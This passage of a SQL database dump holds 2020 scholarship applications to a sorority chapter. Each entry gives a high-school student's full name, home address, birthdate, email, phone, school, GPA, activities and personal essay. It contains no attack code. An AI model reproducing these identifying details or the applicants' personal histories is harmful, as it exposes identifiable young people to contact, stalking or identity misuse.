who cannot speak for themselves, and to listen to those who are not heard. \r\n\r\n\r\nAs a Black woman, I know what it feels like to be looked down upon because of factors that I cannot control. However, I am blessed with the opportunity to advance my education, and realize that even a high school education is something that many people across the world are denied because of their age, status, or gender. Education is known as the great equalizer, meaning that with an education, doors open to a future that may not have been offered. While education is a grave concern, it is just one barrier to a globally equal playing field.\r\nThrough my college education, I will be equipped with the education and experiences necessary to implement change. Spending time abroad, studying specific issues such as lack of access to education, will help me to gain a deeper understanding of the trials that people are faced with. Attending a university ensures the hands-on experience in a productive way. \r\n\r\n\r\nWhile thinking globally, I am acting locally to ensure that the most vulnerable voices are heard. From making the motion for Black Lives Matter Week in Schools to advocating for student voice on budget committees, my leadership is geared toward equality and empathy. My goals for the future are similar. In order to lift up underserved individuals, I will be advocating and lobbying for women’s rights. To reach this goal, higher education is uncompromisable. With the award from the Lambda Gamma Zeta Chapter of the Zeta Phi Beta Sorority Incorporated, the needs of the people I lead will be met.'),(4926,405,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/AAlston-Ruth-Conway-Scholarship-Essay.docx'),(4927,405,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Allison-unofficial-transcript.pdf'),(4928,405,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Conway-Scholarship-release.pdf'),(4929,406,6,18.3,'Micah'),(4930,406,6,18.6,'Butler'),(4931,406,6,19.1,'6991 Southmoor Street'),(4932,406,6,19.3,'Hanover'),(4933,406,6,19.4,'MD'),(4934,406,6,19.5,'21076'),(4935,406,6,19.6,'United States'),(4936,406,6,4,'03-27-2002'),(4937,406,6,21,'agm_butler@yahoo.com'),(4938,406,6,20,'(703) 899-9458'),(4939,406,6,10,'Long Reach High School'),(4940,406,6,27,'Other'),(4941,406,6,28,'Internet Research'),(4942,406,6,9,'3.6'),(4943,406,6,26,'Exercise Science/Pre-Physical Therapy'),(4944,406,6,12,'NA'),(4945,406,6,14,'1. Alpha Achievers (Howard County) (Mar 2019 - Present) Active Member\r\n2. National Honor Society (Nov 2018 - Present) Active Member\r\n3. Long Reach Flash - High School Newspaper (Sep 2018 - Jun 2019) Peer Writer'),(4946,406,6,13,'1. National Honor Society (Nov 2018-Present)\r\n2. A/B Honor Roll Sep 2016 - Present (Each semester of high school)'),(4947,406,6,36,'1. Howard County NAACP Youth Council (Aug 2017 - Present) Secretary and 2 x National Delegate, conducted Membership Intake, Served food to those less fortunate (2019), Voices4Change $500 Grant Award Winner (2019), Howard County Board of Education Presenter (2018)\r\n2. Howard County Police Department (Feb 2018 - Present) Teen Court Juror and Sanctions Review Committee Member\r\n3. Baltimore Veterans Administration Hospital, Baltimore, MD (Jun 2019-Aug 2019) Physical Therapy Clinic Volunteer, received 75-hour award \r\n4. So Others Might Eat Volunteer, Washington, DC (Aug 2017) Served food to those less fortunate\r\n5. Osan Air Base (AB) Vacation Bible School Instructor, Osan AB South Korea (2015-2016) Led youth in daily activities, songs, bible verses and games'),(4948,406,6,37,'Applied and accepted to all of the following:\r\n1. Old Dominion University\r\n2. Hampton University\r\n3. Temple University\r\n4. Virginia Commonwealth University\r\n5. University of Maryland Eastern Shore'),(4949,406,6,40,'For as long as I can remember, our communities have lived under the threat of gun violence. Guns have been used as tools to intimidate, control people, and in the commission of crimes. My generation has certainly witnessed the latter. Gun violence has found its way from the night and dark alleyways, and into the light of day. There are no more safe havens; churches aren’t safe, public events aren’t safe, and neither are schools. Guns are too easily accessible because of our gun laws and our culture of devaluing life for money.  I have and will continue to work in my community to end gun violence but I can’t do it alone. I need a comprehensive college education providing the foundations of civics, law, public administration and policy. \r\n\r\nAlthough people understand the effects of gun violence, prayers, anger, and dismay are not enough to save us. According to CNN, over the past decade, 15,000 citizens were fatally shot in the United States.  In 2019, more than 177 American schools have experienced a horrific shooting leaving a tragic scene in its aftermath. The most recent and deadly shooting was the Stoneman Douglas High School shooting in Florida that left 17 dead and 17 injured. Learning of the violent tragedy at Stoneman Douglas impacted me in a way that can only be described as “personal” after having lived in Florida for three years.  Not only that, this particular act of gun violence could have happened to me here in Columbia, Maryland.  As a high school student this reality left me in a state of disbelief. \r\n\r\nBecause of these heinous acts, I pledged to use my voice as a proponent for change. I attended the March for Our Lives Rally in Washington D.C. in 2018 with like-minded citizens to take a stand against gun violence. This rally brought awareness to politicians across the United States that we are united as one and will not back down. The main objectives included the demand for universal background checks on every gun sale, raising the federal gun ownership to 21 years of age, and resurrecting the 1994 federal assault weapons ban. I desire to be on this side of history fighting against what has taken innocent lives.\r\n\r\nA college education will help me understand how to change laws to stop gun violence and how the Constitution\'s second amendment is at the center of this fight. Finally, collaborating with other students and receiving different opinions gives people such as myself the chance to express themselves and their passions. It\'s also an opportunity to build a network to change the old ways of thinking and make positive impacts to the world around me. Gun violence must end to protect the lives of innocent citizens. As a young adult, I am ready to advocate for change and stand-up for protection and stricter gun laws. I will need a college education to step out into the world with as much preparation and knowledge to better fight systematic bureaucracy.'),(4950,406,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPB-Unofficial-Transcript_Micah-Butler.pdf'),(4951,406,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPB-Release-Form_Micah-Butler.pdf'),(4952,406,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPB-Senior-Portrait_Micah-Butler.pdf'),(4953,407,6,18.3,'Camryn'),(4954,407,6,18.6,'Harris'),(4955,407,6,19.1,'9908 FRAGRANT LILIES WAY'),(4956,407,6,19.3,'LAUREL'),(4957,407,6,19.4,'MD'),(4958,407,6,19.5,'20723'),(4959,407,6,19.6,'United States'),(4960,407,6,4,'10-09-02'),(4961,407,6,21,'camalyce@gmail.com'),(4962,407,6,20,'(919) 780-7825'),(4963,407,6,10,'Atholton High School'),(4964,407,6,27,'Social Media'),(4965,407,6,28,'N/A'),(4966,407,6,9,'3.80'),(4967,407,6,26,'Global Studies/Political Science'),(4968,407,6,12,'NA'),(4969,407,6,14,'Howard County National Society of Black Engineers Jr, 3 years, current President and former Membership Chair \r\nPrincipal\'s Advisory Committee, 1 year, Vice Committee Chair\r\nNational Honors Society, 2 Years, Member\r\nMath, Engineering, Science, Achievement (MESA) Club, 5 years, Group Leader for presentations\r\nNational Art Honor Society, 1 year, Member\r\nStudent Page for the Maryland General Assembly, 1 year, Page working with Senators'),(4970,407,6,13,'Received Maryland General Assembly Official Citation for Leadership and\r\nGold Honor Roll; throughout high school\r\nService for the Hoopin for Teen Health Basketball Tournament presented by Delegate\r\nDarryl Barnes in 2019\r\nWon award for Third Place: Best Photo in the Fifth Annual Atholton Art in 2019\r\nAward for being a Student Page with the Maryland General Assembly presented by President of the Senate Bill Ferguson in 2020'),(4971,407,6,36,'Howard County National Association for the Advancement of Colored People (NAACP) Youth Council, current President, member for 2 years\r\nHoward County Teen Court, Member of the Jury, 1 year (fall and spring sessions)\r\nLaurel Church of Christ, Volunteered to help with meal packing for the homeless, 2 years'),(4972,407,6,37,'Howard University, Elon University, University of Maryland,-College Park and Penn State University'),(4973,407,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/W.-Ruth-Conway-Scholarship-Essay-1.pdf'),(4974,407,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Official.pdf'),(4975,407,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/LGZScholarshipReleaseForm-CHarris.pdf'),(4976,408,6,18.3,'Garland'),(4977,408,6,18.6,'Crosby'),(4978,408,6,19.1,'5666 Sheerock CT'),(4979,408,6,19.3,'Columbia'),(4980,408,6,19.4,'Maryland'),(4981,408,6,19.5,'21045'),(4982,408,6,19.6,'United States'),(4983,408,6,4,'04-17-02'),(4984,408,6,21,'Garlandcrosbyiii@outlook.com'),(4985,408,6,20,'(443) 545-9175'),(4986,408,6,10,'Howard High School'),(4987,408,6,27,'Newsletter'),(4988,408,6,28,'N/A'),(4989,408,6,9,'3.05'),(4990,408,6,26,'Business'),(4991,408,6,12,'NA'),(4992,408,6,14,'- Founder & President, Music Technology Club, fall 2018 – spring 2019\r\n- School Play Chorus Member, fall 2018; winter 2017-2018\r\n- High School Wrestling Team, winter 2016-2017\r\n- Howard High School Student Mentor, 2019-2020\r\n- Howard High School Lion Leader, 2019-2020 \r\n- Asian American Association 2019-2020'),(4993,408,6,13,'- National Honor Society Member, inducted fall 2019\r\n- Modern Music Masters Honor Society Member, inducted fall 2019\r\n- Selected to be a mentor for Howard High Schools\' first student-to-student mentoring program 2019-2020\r\n- Selected to be a LEO  (Leading Each Other) to help freshman transition into high school 2019-2020'),(4994,408,6,36,'- Volunteer assisting with letter folding, event set up and other tasks, Foundation Fighting Blindness, 2016- present\r\n- Camp Counselor, Camp Locust of Locust United Methodist Church (LUMC), July 2017\r\n- Host for Foreign Exchange Student from Ghana, Columbia Sister Cities Exchange, Summer 2016\r\n- Master of Ceremony for ROCK Youth Retreat of the Baltimore-Washington Conference of the United Methodist Church, January 2018, 2019 and 2020\r\n- ROCK Youth Retreat planning committee board member, 2017- 2020\r\n- LUMC Youth Group President, 2016-2018'),(4995,408,6,37,'University of Maryland Baltimore County \r\nNorth Carolina Agricultural and Technical State University\r\nHoward Community College'),(4996,408,6,40,'Essay C. In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. What societal issue(s) do you most want to defeat (or help address) and how might a college education best equip you to engage in the issue(s)?\r\n\r\nThe social issue I plan to address is the wealth gap among races in the United States. This problem and how to overcome it is not addressed in schools which leads to youth not knowing how to build wealth. In a country where money is key to a stable life, this is a problem. With a college education, I’ll better understand how large the gap is and its negative effects on society. I look forward to taking courses and learning from my professors about differences in wealth among people of various demographics. My goal in life is to close the wealth gap in the United States.\r\n\r\nHaving a college education will help me understand the wealth gap and create a plan to close it. By taking American history, sociology, and economics, I’ll learn the history of how the wealth gap became a problem. During my free time, I plan to work with my professors to learn how wealth was built and kept. I\'ll work with my professors to develop campaigns, programs, and advertisements to spread information to my target audience. This is how I will address and begin solving the social issue.'),(4997,408,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Garland-Crosby-III-Transcript-Unofficial-2-2019.pdf'),(4998,408,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Garland-Crosby-Release-Form.pdf'),(4999,408,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Garland-Crosby-Release-Form1.pdf'),(5000,409,6,18.3,'Auriel'),(5001,409,6,18.6,'White'),(5002,409,6,19.1,'8633 Cheshire Ct.'),(5003,409,6,19.3,'Jessup'),(5004,409,6,19.4,'Maryland'),(5005,409,6,19.5,'20794'),(5006,409,6,19.6,'United States'),(5007,409,6,4,'08-07-02'),(5008,409,6,21,'auriel.lanae704@yahoo.com'),(5009,409,6,20,'(513) 387-9110'),(5010,409,6,10,'Hammond High School'),(5011,409,6,27,'School Counselor/Advisor'),(5012,409,6,28,'N/A'),(5013,409,6,9,'3.95'),(5014,409,6,26,'Mathematics'),(5015,409,6,12,'N/A'),(5016,409,6,14,'- Advanced Chamber Orchestra\r\n        -  Years of membership: 9th-12th grade\r\n        -  Positions held: section leader (12)\r\n- Math Team\r\n        -  Years of membership: 11th and 12th grade\r\n        -  Positions held: team leader (12)\r\n- Math Honor Society\r\n        -  Years of membership: 11th and 12th grade\r\n- Science Club\r\n        -  Years of membership: 11th and 12th grade\r\n- Science Honor Society\r\n        -  Years of membership: 11th and 12th grade\r\n- Math honor society\r\n        -  Years of membership: 11th and 12th grade'),(5017,409,6,13,'- I represented Hammond High School in the Central Maryland Physics Olympics during my junior year and placed first out of the Howard County teams (11)\r\n- Honor Roll Student (9-12)\r\n- Student of the Month (11 & 12)\r\n- AP scholar (12)\r\n- Published poem in \"The Vision\" literary magazine'),(5018,409,6,36,'- Tutored peers in math\r\n- Helped Calculus AB students with AP free-response questions at after school \"problem set parties\" \r\n- Volunteered to help at church\r\n- Helped with the Orchestra summer camp for elementary and middle schoolers in the Howard County area'),(5019,409,6,37,'- St. Mary\'s College of Maryland\r\n- Vassar College'),(5020,409,6,40,'Essay C. In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. What societal issue(s) do you most want to defeat (or help address) and how might a college education best equip you to engage in the issue(s)?\r\n\r\n“If women get rights equal to those of men does that mean men will be able to hit women”. \r\n\r\nWhen I tell men that I am a feminist I am usually greeted with some form of this response. Instead of acknowledging the struggles that women go through, people will immediately try to figure out how feminism affects them personally. However, in focusing on whether or not men can hit women we are only normalizing domestic abuse. Instead, why don’t we focus on the more pressing issues pertaining to feminism? For example, what about the fact that women only gained the right to vote in 1920. Or that according to the United States Census Bureau, in 2019 women made about 82 cents for every dollar men made. Or what about the over 200,000 rape kits across the United States that remain untested. \r\n\r\nI have seen the lack of equality between the sexes firsthand in many of my classes. In my more advanced science and math classes like AP Physics C: Mechanics, AP Calculus AB, and AP Calculus BC, I am often one of two black women in my class, and sometimes I am the only one. I see this as extremely problematic. As of 2020, my school is 41.8% black and 25.8% white, so why are there so many white males in my classes and so few black women? Following college, I hope to change this by speaking to others about my experiences, and by showing other black women that they are just as smart, if not smarter than their white classmates and that they too can reach amazing heights if they believe in themselves.\r\n\r\nTo accomplish this, in college I will be pursuing a minor in Gender and Sexuality Studies and a possible major in math, but I am also considering other STEM-related majors. Through a college education, I will not only be able to pursue a STEM career, but by minoring in Gender and Sexuality Studies I will also be able to gain a better understanding of how culture, gender, and race affect different people. Whether I am teaching advanced math at a college/university or designing a new type of aircraft with increased safety precautions (to name a few possibilities), I will be using my college education to make a difference in the lives of others. My minor in Gender and Sexuality Studies will help me to speak out about difficult issues and will help me to be successful as I become a leading figure in a STEM field and a role model for black girls everywhere. I will be able to make a difference in society and help address the inequalities that currently plague our world as well as bring awareness to issues like racism, sexism, and discrimination.\r\n\r\nWord Count: 464'),(5021,409,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/IMG_9883.pdf'),(5022,409,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Auriel-transcript.pdf'),(5023,409,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/IMG_3193.pdf'),(5024,410,6,18.3,'Jacob'),(5025,410,6,18.6,'Ethridge'),(5026,410,6,19.1,'6300 Canyon Head Lane'),(5027,410,6,19.3,'Columbia'),(5028,410,6,19.4,'Maryland'),(5029,410,6,19.5,'21045'),(5030,410,6,19.6,'United States'),(5031,410,6,4,'06/08/2002'),(5032,410,6,21,'jmeone@me.com'),(5033,410,6,20,'(410) 440-1430'),(5034,410,6,10,'Long Reach High School'),(5035,410,6,27,'Friend/Family Member'),(5036,410,6,28,'N/A'),(5037,410,6,9,'3.59'),(5038,410,6,26,'Business Administration'),(5039,410,6,12,'N/A'),(5040,410,6,14,'Jack & Jill of America Incorporated; 15 years; Chaplain, Historian, Vice President\r\n19th Annual \"Excellence Personified\" Biennial Beautillion Class of 2019 Ball; 1 year; Beau\r\nAlpha Achievers; 3 years; Secretary\r\nLong Reach High School Jr. Varsity Soccer; 2 years; Captain\r\nLong Reach High School Varsity Soccer; 2 years; Captain\r\nThunder Soccer Club; 9 years; Captain\r\nProject 13 Soccer Program; 9 years; Defender\r\nBlack Student Union; 2 years; Member, Actor, Model'),(5041,410,6,13,'National Honor Society Member --> 2018\r\nSpanish National Honor Society Member --> 2018\r\nEnglish National Honor Society Member --> 2019\r\nHonor Roll --> 2016-2020\r\nRho Kappa Social Studies National Honor Society Member --> 2019\r\nJack & Jill Oratorical Speech Competition Competitor --> 2018\r\nHoward County Gifted & Talented Annual Learning Conference Presenter --> 2018-2019\r\n19th Annual \"Excellence Personified\" Biennial Beautillion Class of 2019 Ball Beau --> 2019'),(5042,410,6,36,'National Honor Society; Genius Hour at Deep Run Elementary School Mentor; 2019\r\nJack & Jill of America Incorporated; Corduroy\'s Closet; 2016-2019\r\nOperation Christmas Child; Show box collecting/packing; 2014-2018\r\nChurch Board; Ushering; 2017-Present\r\nAlpha Achievers; Mayfield Woods Mentoring; 2017-2020\r\nBlack Student Union; Black Expo Volunteering/Performing; 2020\r\nNational English Honor Society; Freshman English Midterm Preparation Clinic; 2020\r\nNational Honor Society; \"Change Matters\" Fundraising\r\nJack & Jill of America Incorporated; \"Stop the Hunger\" MLK day of service food packing activity; 2020\r\nJack & Jill of America Incorporated; NAMI Dinner; 2018, 2019\r\nJack & Jill of America Incorporated; Lifeguard Swim Lessons; 2019\r\nAlpha Achievers; AKA Coat Drive Assitance; 2019\r\nRho Kappa Social Studies National Honor Society; Howard County Solo/Ensemble Festival Grading Sheet Runner; 2020'),(5043,410,6,37,'Hampton University, Florida A&M University, Howard University, Morehouse College, University of Connecticut, University of Pennsylvania, Yale University, University of Maryland College Park, Delaware State University'),(5044,410,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Zeta-Phi-Beta-Sorority-Inc.-W.-Ruth-Conway-Scholarship-Essay.docx'),(5045,410,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Jacob-M-Ethridge-transcript.pdf'),(5046,410,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Scannable-Document-on-Mar-29-2020-at-8_33_37-PM.pdf'),(5047,411,6,18.3,'Ireoluwa'),(5048,411,6,18.6,'Omitowoju'),(5049,411,6,19.1,'5114 Honey Locust Ct'),(5050,411,6,19.3,'Ellicott City'),(5051,411,6,19.4,'MD'),(5052,411,6,19.5,'21042'),(5053,411,6,19.6,'United States'),(5054,411,6,4,'03-10-02'),(5055,411,6,21,'ireomit@gmail.com'),(5056,411,6,20,'(443) 801-0749'),(5057,411,6,10,'River Hill High School'),(5058,411,6,27,'Friend/Family Member'),(5059,411,6,28,'NA'),(5060,411,6,9,'3.83'),(5061,411,6,26,'Business or Biology  and pre-med'),(5062,411,6,12,'NA'),(5063,411,6,14,'-Future Business Leaders of America  \r\n Executive Vice President   June 2019- Present\r\n Officer at Large                      June 2018 - June 2019\r\n General Member                    September 2016 - June 2018 \r\n\r\n-River Hill POMS  \r\nTeam Captain        April 2018 - Present\r\nGeneral Member  September 2016- April 2018\r\n\r\n-Black Leadership Union \r\nPresident  September 2019 - Present\r\nHistorian   September 2018 - June 2019\r\nGeneral Member September 2016- June 2018\r\n\r\n-National Honor Society \r\nMember November 2018 - Present\r\n\r\n-Delta Scholars \r\nVice President  September 2019 - Present\r\n BLU Liaison         September 2018- June 2019\r\n General Member September 2017- June 2018\r\n\r\n-Class of 2020 Student Government Association \r\nVice President  June 2017- Present\r\n\r\n-Leadership, Education, and Development (LEAD) Program \r\n Participant                            July 2019\r\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\r\nStrengthened and developed communication skills within a diverse group of students \r\n\r\n-Kindred Hair and Skin Center \r\n Internship			  September 2018 - Present\r\nShadow board certified dermatologist  in appointments and various dermatology procedures\r\nOrganize and complete paperwork \r\n\r\n-Maryland Leadership Workshop \r\nAdvanced Leadership Workshop, University of Maryland, Baltimore County 	                                   July 2018\r\nSenior High Camp, Washington College					                                   July 2017\r\nNetworked and partnered with students across Maryland to analyze real life scenarios/problems and develop probable solutions\r\n\r\n-Junior Achievement Rising Woman \r\nVP of Supply Chain	            September 2017 - January 2018\r\nWorked as part of a team to build a company and product\r\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers'),(5064,411,6,13,'Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\r\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\r\nFuture Business Leaders of America State Conference|4th place Business Plan/Presentation     [March 2019]\r\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\r\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\r\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\r\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]'),(5065,411,6,36,'Wazobia Starz Youth Dance Group \r\nChoreographer and Mentor                          [September 2016 - Present]\r\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\r\n\r\nNational Honor Society                           \r\nMember                                 [November 2018 - Present]\r\nVolunteer for community service in and out of school\r\n30 hours of community service per school year\r\n\r\nStudent Member of the Board \r\nStudent Delegate 				             [February 2018]\r\nHelped to elect the final Student Member of the Board candidates and communicated information to students of River Hill High School'),(5066,411,6,37,'University of Southern California \r\nScripps College\r\nUniversity of North Carolina \r\nUniversity of Maryland College Park\r\nSpelman College'),(5067,411,6,40,'As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the “only black girl,” in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, “only black girl” became my anchor for self-confidence, growth, and faith. \r\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \r\n“Only black girl” is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https://therbcpa.weebly.com/ ) \r\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \r\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.'),(5068,411,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Unofficialtranscript.pdf'),(5069,411,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ReleaseForm.pdf'),(5070,411,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Ireheadpic.pdf'),(5071,412,6,18.3,'Lavila'),(5072,412,6,18.6,'Jackson'),(5073,412,6,19.1,'6246 Heather Glen Way'),(5074,412,6,19.3,'Clarksville'),(5075,412,6,19.4,'MD'),(5076,412,6,19.5,'21029'),(5077,412,6,19.6,'United States'),(5078,412,6,4,'01-01-02'),(5079,412,6,21,'Ldjackson929@gmail.com'),(5080,412,6,20,'(443) 852-7036'),(5081,412,6,10,'Oakland Mills High School'),(5082,412,6,27,'Friend/Family Member'),(5083,412,6,28,'N/A'),(5084,412,6,9,'3.1'),(5085,412,6,26,'Behavioral Psychology/Business'),(5086,412,6,12,'N/A'),(5087,412,6,14,'1.  The National Society of High School Scholars- 2019 to current.  Selected Participant\r\n2.  Afro-Caribbean Cultural Club- 2019 to current. -CoFounder and President\r\n3.   Delta Scholars- 2016 to current.  Member\r\n4.  Today\'s Leaders- 2017 to current.  Selected Participant\r\n5.  Future Business Leaders of America- 2019 to current. Member\r\n6.  DECA (Distributive Education Clubs of America- 2017 to 2019.- Member\r\n7.  Junior Achievement Rising Women- 2018 to 2019. - Selected Participant\r\n8.  Leadership U Howard County-2018 to 2019. - Team Project Leader\r\n9. HCPSS Superintendent\'s Diversity, Equity and Inclusion Advisory Committee- 2018-2019. Selected Participant\r\n10. HCEDA Internship and Apprenticeship Program-2018-2019. Selected Participant  \r\n11. Howard County Association of Student Council- 2018-2019. Member\r\n12. At The Well Leadership Conference- Summer, 2017. Selected Participant\r\n13.  Dale Carnegie Young Adult Leadership Program- Summer, 2017. Participant'),(5088,412,6,13,'1. Honor Roll- 2017, 2018, 2019\r\n2. The National Society of High School Scholars- 2019, 2020\r\n3. The Council of Elders of the Black Community of Howard County Maryland Academic Excellence Acknowledgment- 2016, 2017, 2018, 2019.\r\n4. Delta Scholar- 2017, 2018, 2019, 2020. (Delta Scholars is a serviced-based honor society  for Howard County high school women of color)'),(5089,412,6,36,'1.  Expert Panel on Teen Depression and Suicide Awareness, in conjunction with Leadership U, Howard County -  I headed a team of students in the coordination of a panel of mental health experts who answered questions about how to help teens who struggle with depression or are contemplating suicide.  The event was free and open to the public.  The goal of the program was to increase awareness of the devastating impact of teen depression and suicide and to arm the community with effective tools to help their friends and loved ones.  ( Fall, Winter 2018).\r\n\r\n2.  Howard County Food Bank Volunteer-  I sorted and stocked food donations, (Summer 2018).  \r\n\r\n3.    Howard County Community Garden Volunteer- I weeded plots and removed debris in the county garden, which provides clean and nutritious food.  (Summer 2018).   \r\n\r\n4.  Suicide Prevention Training for Oakland Mills High School Students, in conjunction with Grassroots Crisis Center- I organized  a training wherein more than forty (40) Oakland Mills High School students   were taught how to recognize the warning signs of someone facing  a suicide crisis, as well as how to question, persuade and refer individuals in crisis to help. (Spring, 2019).\r\n\r\n5.  Biz Kidz Kidpreneur Program Volunteer- For several months, I volunteered my time and administrative skills (answered phones, made calls, set up and took down learning stations, assisted youth participants with their projects, etc) in a program for young entrepreneurs.  This volunteer effort was through the Howard County Economic Development Authority (HCEDA).  (Winter, Spring, 2019).\r\n  \r\n6.  Soup\'r Sundae Annual Fundraiser Volunteer-  I served ice cream and  soup to attendees of this annual fundraiser for Howard County\'s Grassroots Crisis Intervention Center. (Spring, 2019).  * I am also scheduled to participate this Spring but it has been temporarily postponed due to the corona virus health crisis.  \r\n\r\n7.  Toys for Howard County Children Charity Event-  I donated and distributed toys to children in the Oakland Mills community in this charity event organized by the Leadership class at Oakland Mills High School, of which I am a part.  (Winter, 2019)'),(5090,412,6,37,'1.  Hampton University\r\n2.  University of North Carolina Central\r\n3.  Morgan State University'),(5091,412,6,39,'If I were a contestant on Jeopardy, I would choose the category, “resilience.”   Though I have experienced more adversity than most my age, I have been blessed with a resilient spirit that has enabled me to transcend my suffering and pursue my dreams.  I have been an illiterate orphan, an earthquake survivor, and a refugee navigating life in a new land.   Now, I emerge a young woman passionate to serve others.  \r\n     I was born in Port-au-Prince, Haiti.   As a small child, I lived with my mother and two brothers in a tiny house on a hillside.  My father, I never knew him.  All I remember about my mother is her name-- Rose-Marie, and that she supported us by selling mouthwatering legume dishes.  \r\n      When I was six, my mother became very ill.  No longer able to care for me, she made the sacrificial decision to place me in an orphanage. Our last day together, she combed my hair, dressed me, and then took me for a long walk.   We stopped at house with a high concrete fence.  A woman stepped out from behind the fence, and as she grabbed one of my hands, my mother let go of the other. I watched my mom walk away, not realizing it would be the last time I would see her. Months later, I learned that my mother had passed away.  \r\n    Eventually I got used to the tedious rhythm of my new home: wake up, pray, eat, watch television, eat, pray, sleep… repeat. January 12, 2010 was different, though. We were watching TV when suddenly, the ground began to shake.  “Tremor!” yelled one boy as we all scrambled to the courtyard. As thick clouds of dust covered us, we cried and prayed in the midst of unfathomable tragedy. With the orphanage destroyed, we were living on the streets. \r\n     A week later, television journalist Anderson Cooper featured my orphanage’s plight on his show.  The segment moved Pennsylvania governor Ed Rendell to arrange for some of us, me included, to be airlifted to Pittsburgh. Such is how my life in America began.     \r\n     America seemed like paradise initially:  I had a loving new family, food, clothing, and my very own room!  Matters became difficult when I started school.  I spoke no English and could not read or write, placing me solidly behind my classmates.  Navigating America’s culture and school system was extremely challenging.   \r\n     Transformation happened when I remembered God’s faithfulness.  He’d seen me through immense tragedy and had equipped me with great fortitude. Surely I could achieve scholastically and socially, I reasoned.  With that mindset, I worked hard to learn English and to achieve good grades.  I also immersed myself in leadership activities and community service.  I yearn to attend college, which will prepare me to serve the vulnerable.\r\n       I share my story not for sympathy, but so you will understand my path to purpose via a resilient spirit.  I am grateful for my journey for it has taught me to persevere and to believe in miracles.    